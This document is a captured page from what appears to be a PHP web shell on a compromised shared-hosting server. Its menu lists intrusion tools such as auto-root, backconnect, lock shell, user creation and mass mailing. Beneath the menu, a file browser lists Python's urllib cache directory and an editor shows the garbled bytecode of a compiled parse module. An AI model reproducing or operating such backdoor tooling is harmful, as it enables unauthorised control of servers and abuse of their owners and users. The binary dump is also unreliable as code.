Linux cpanel.rrshost.in 5.15.0-25-generic #25-Ubuntu SMP Wed Mar 30 15:54:22 UTC 2022 x86_64
Apache
: 109.123.238.221 | : 172.70.100.159
128 Domain
8.2.28
aev999
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
lib /
python3.10 /
urllib /
__pycache__ /
[ HOME SHELL ]
Name
Size
Permission
Action
__init__.cpython-310.pyc
131
B
-rw-r--r--
error.cpython-310.pyc
2.79
KB
-rw-r--r--
parse.cpython-310.pyc
34.05
KB
-rw-r--r--
request.cpython-310.pyc
69.67
KB
-rw-r--r--
response.cpython-310.pyc
3.39
KB
-rw-r--r--
robotparser.cpython-310.pyc
7.16
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : parse.cpython-310.pyc
o }�5hs� � @ s d Z ddlZddlZddlZddlZddlZddlZg d�Zg d�Zg d�Z g d�Z g d�Zg d�Zg d �Z d ZdZg d�Zd Zi Zdd� ZdZdZdd� Zeefdd�Zeefdd�Zdd� ZG dd� de�ZG dd� de�ZG dd� de�ZG d d!� d!ee�ZG d"d#� d#ee�Zdd$lm Z e d%d&�Z!e d'd(�Z"e d)d*�Z#d+e!_ d,e!j$_ d-e!j%_ d.e"_ d/e"j&_ d0e"j'_ d1e"j(_ d2e"j)_ d3e"j%_ d4e#_ e"j&j e#j&_ e"j'j e#j'_ e"j(j e#j(_ d5e#j*_ e"j)j e#j)_ e"j%j e#j%_ eZ+G d6d%� d%e!e�Z,G d7d'� d'e"e�Z-G d8d)� d)e#e�Z.G d9d:� d:e!e�Z/G d;d<� d<e"e�Z0G d=d>� d>e#e�Z1d?d@� Z2e2� [2d�dCdD�Z3dEdF� Z4d�dGdH�Z5dIdJ� Z6dKdL� Z7dMdN� Z8d�dOdP�Z9dQdR� Z:dSdT� Z;d�dUdV�Z<dWdX� Z=dYZ>da?dZd[� Z@e�Ad\�ZBd�d_d`�ZC a bd�dcdd�ZD a bd�dedf�ZEd�dgdh�ZFeGdi�ZHeIeH�ZJi ZKG djdk� dkejL�ZMd�dmdn�ZNd�dodp�ZOd�dqdr�ZPdadAddeOfdsdt�ZQdudv� ZRdwdx� ZSdydz� ZTd{d|� ZUdaVd}d~� ZWdd�� ZXdaYd�d�� ZZd�d�� Z[d�d�� Z\d�d�� Z]d�d�� Z^d�d�� Z_da`d�d�� Zad�d�d��Zbd�d�d��Zcd�d�� Zdd�d�� Zed�d�� Zfd�d�� Zgd�d�� Zhd�d�� Zid�d�� Zjd�d�� ZkdS )�a3 Parse (absolute and relative) URLs. urlparse module is based upon the following RFC specifications. RFC 3986 (STD66): "Uniform Resource Identifiers" by T. Berners-Lee, R. Fielding and L. Masinter, January 2005. RFC 2732 : "Format for Literal IPv6 Addresses in URL's by R.Hinden, B.Carpenter and L.Masinter, December 1999. RFC 2396: "Uniform Resource Identifiers (URI)": Generic Syntax by T. Berners-Lee, R. Fielding, and L. Masinter, August 1998. RFC 2368: "The mailto URL scheme", by P.Hoffman , L Masinter, J. Zawinski, July 1998. RFC 1808: "Relative Uniform Resource Locators", by R. Fielding, UC Irvine, June 1995. RFC 1738: "Uniform Resource Locators (URL)" by T. Berners-Lee, L. Masinter, M. McCahill, December 1994 RFC 3986 is considered the current standard and any future changes to urlparse module should conform with it. The urlparse module is currently not entirely compliant with this RFC due to defacto scenarios for parsing, and for backward compatibility purposes, some parsing quirks from older RFCs are retained. The testcases in test_urlparse.py provides a good indicator of parsing behavior. The WHATWG URL Parser spec should also be considered. We are not compliant with it either due to existing user code API behavior expectations (Hyrum's Law). It serves as a useful guide when making changes. � N)�urlparse� urlunparse�urljoin� urldefrag�urlsplit� urlunsplit� urlencode�parse_qs� parse_qsl�quote� quote_plus�quote_from_bytes�unquote�unquote_plus�unquote_to_bytes�DefragResult�ParseResult�SplitResult�DefragResultBytes�ParseResultBytes�SplitResultBytes)� �ftp�http�gopher�nntp�imap�wais�file�https�shttp�mms�prospero�rtsp�rtspu�sftp�svn�svn+ssh�ws�wss)r r r r r �telnetr r r r! r r �snewsr"